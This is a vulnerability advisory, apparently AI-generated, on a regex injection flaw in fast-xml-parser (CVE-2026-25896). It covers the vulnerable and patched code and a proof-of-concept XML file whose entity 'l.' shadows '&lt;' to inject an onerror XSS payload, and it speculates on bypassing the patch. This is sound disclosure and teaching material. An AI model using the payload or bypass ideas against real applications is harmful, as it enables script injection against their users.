CVEReports
CVEReports

Automated vulnerability intelligence platform. Comprehensive reports for high-severity CVEs generated by AI.

Product

  • Home
  • Sitemap
  • RSS Feed

Company

  • About
  • Contact
  • Privacy Policy
  • Terms of Service

© 2026 CVEReports. All rights reserved.

Made with love by Amit Schendel & Alon Barad



CVE-2026-25896
9.3

Regex Injection in fast-xml-parser: Shadowing the <

Amit Schendel
Amit Schendel
Senior Security Researcher

Feb 20, 2026·5 min read·5 visits

PoC Available

Executive Summary (TL;DR)

User-supplied XML entity names are passed directly into `new RegExp()`. Attackers can define an entity named `l.` which creates a regex that matches `<`, allowing them to overwrite the less-than symbol with malicious HTML tags (XSS).

A critical regex injection vulnerability exists in the `fast-xml-parser` library (versions 4.1.3 to <5.3.5). The parser constructs regular expressions dynamically from untrusted DOCTYPE entity names without proper escaping. This allows attackers to define malicious entities that 'shadow' built-in XML entities like `&lt;` or `&amp;`. By replacing these safe entities with arbitrary content, attackers can bypass entity encoding and achieve Cross-Site Scripting (XSS) in downstream applications relying on the parser's output.

The Hook: Parsing at the Speed of Insecurity

XML parsing is a thankless job. It’s verbose, complicated, and prone to 'Billion Laughs' attacks. So, when a library like fast-xml-parser comes along promising high performance and low overhead, developers flock to it like moths to a flame. It is a staple in the Node.js ecosystem, used to translate the ancient language of XML into the modern comfort of JSON.

But speed often comes at the cost of correctness—or in this case, sanity. In an effort to handle custom XML entities defined in DOCTYPE blocks (those <!ENTITY ...> declarations), the library developers made a classic, fatal error: they trusted the input. Specifically, they trusted that an entity name would just be a name.

This vulnerability isn't your standard buffer overflow or logic error. It is a Regex Injection. The parser takes strings from the XML document and compiles them directly into executable Regular Expressions. If you know anything about security, you know that new RegExp(userInput) is the software equivalent of handing a loaded gun to a toddler.

The Flaw: When a Dot is Not Just a Dot

Here is the fundamental disconnect: The XML specification allows periods (.) in entity names. Regular Expressions use the period (.) as a wildcard that matches any single character (except newlines).

When fast-xml-parser encounters a DOCTYPE definition like <!ENTITY my.entity "value">, it needs a way to find and replace usages of that entity later in the document. To do this, it dynamically generates a Global Regular Expression. The logic effectively boils down to:

const regex = new RegExp('&' + entityName + ';', 'g');

See the problem? If an attacker defines an entity named l., the generated regex becomes /&l.;/g.

In the world of regex, /&l.;/ doesn't just match the literal string &l.;. It matches &la;, &lb;, &l!;, and—crucially—&lt;. Since &lt; is the standard XML entity for the less-than character (<), this creates a collision. The parser doesn't treat &lt; as a protected keyword; it just sees text that matches the attacker's wildcard regex.

The Smoking Gun: Source Code Analysis

Let's look at the crime scene in src/xmlparser/DocTypeReader.js. This is where the parser reads the DTD and builds its substitution map.

Vulnerable Code (< 5.3.5):

// Inside the entity parsing loop
entities[entityName] = {
    // The fatal flaw: passing entityName directly to RegExp constructor
    regx : RegExp(`&${entityName};`, "g"),
    val: val
};

It is shockingly simple. There is no sanitization, no escaping, and no RegExp.escape() (which doesn't natively exist in JS anyway, but that's no excuse).

When the parser later iterates through the document to replace entities, it loops through this entities object. If the attacker's malicious regex runs before the built-in handlers (or if it simply shadows them by nature of the replacement logic), the built-in safety mechanisms are bypassed.

The logic essentially says: "Find anything looking like &l<any_char>; and replace it with the attacker's string." Since &lt; fits that description, it gets clobbered.

The Exploit: Shadowing the Gods

To exploit this, we don't need memory corruption. We just need to define an entity that, when turned into a regex, matches a target we want to overwrite. The most valuable target in an XML context is &lt; because it represents the opening of a tag.

The Attack Chain:

  1. Define the Payload: We create a DOCTYPE with an entity named l.. The value of this entity will be our malicious HTML/JS.
  2. The Trigger: In the body of the XML, we use the standard, safe entity &lt;.
  3. The Substitution: The parser compiles /&l.;/g. It scans the text &lt;. The regex matches. The parser swaps &lt; for our payload.

Proof of Concept:

<?xml version="1.0"?>
<!DOCTYPE pwn [
  <!-- The entity name 'l.' becomes regex /&l.;/ which matches '&lt;' -->
  <!ENTITY l. "<img src=x onerror=alert('Pwned')>">
]>
<root>
  <!-- The parser sees '&lt;', matches it against /&l.;/, and injects the tag -->
  <data>Hello &lt;b&gt;World&lt;/b&gt;</data>
</root>

Result: Instead of rendering safe text like Hello <b>World</b>, the application renders: Hello <img src=x onerror=alert('Pwned')>b>World<...

The browser sees the <img> tag and executes the JavaScript.

The Fix (and Why It's Still Sketchy)

The maintainers released version 5.3.5 to address this. Let's look at their solution. Instead of refactoring to avoid Regex for entity replacement (the ideal solution), they opted for a blacklist/escape approach.

The Patch in 5.3.5:

// The attempt to sanitize the entity name
const escaped = entityName.replace(/[.\-+*:]/g, '\\.');
const regx = new RegExp(`&${escaped};`, "g");

> [!WARNING] > Researcher Note: This patch is brittle.

  1. It converts everything to a dot: The code replaces . with \.. That's good. But it also replaces -, +, *, and : with \.. This effectively changes the entity name in the regex. If I have an entity my-ent, the regex becomes /my\.ent/. This breaks exact matching for those characters.
  2. Incomplete Blacklist: Regex has many metacharacters. The patch misses |, ?, ^, $, (, ), [, ], {, }.

Re-exploitation Potential: An attacker might try to use the pipe | (OR operator). If we define an entity named lt|amp, the regex becomes /&lt|amp;/. This is invalid regex syntax (it would look for &lt OR amp;), but a clever attacker might find combinations of unescaped characters (like optional ? or classes []) to construct valid regexes that still shadow built-in entities. The "fix" is more of a band-aid than a cure.

Official Patches

NaturalIntelligenceFix commit on GitHub

Fix Analysis (1)

Technical Appendix

CVSS Score
9.3/ 10
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:N

Affected Systems

Node.js applications using fast-xml-parserFrontend applications bundling fast-xml-parserAPI gateways transforming XML to JSON

Affected Versions Detail

Product
Affected Versions
Fixed Version
fast-xml-parser
NaturalIntelligence
>= 4.1.3, < 5.3.55.3.5
AttributeDetail
CWE IDCWE-185 (Incorrect Regular Expression)
CVSS Score9.3 (Critical)
Attack VectorNetwork (AV:N)
Exploit StatusPoC Available
ImpactXSS / Integrity Compromise
Patch QualityPartial / Brittle

MITRE ATT&CK Mapping

T1190Exploit Public-Facing Application
Initial Access
T1059.007Command and Scripting Interpreter: JavaScript
Execution
CWE-185
Incorrect Regular Expression

Known Exploits & Detection

Internal ResearchConstructed PoC using DOCTYPE entity 'l.' to shadow '&lt;'.

Vulnerability Timeline

Patch released in version 5.3.5
2026-02-08
CVE-2026-25896 Published
2026-02-20

References & Sources

  • [1]GitHub Advisory GHSA-m7jm-9gc2-mpf2

Attack Flow Diagram

Press enter or space to select a node. You can then use the arrow keys to move the node around. Press delete to remove it and escape to cancel.
Press enter or space to select an edge. You can then press delete to remove it or escape to cancel.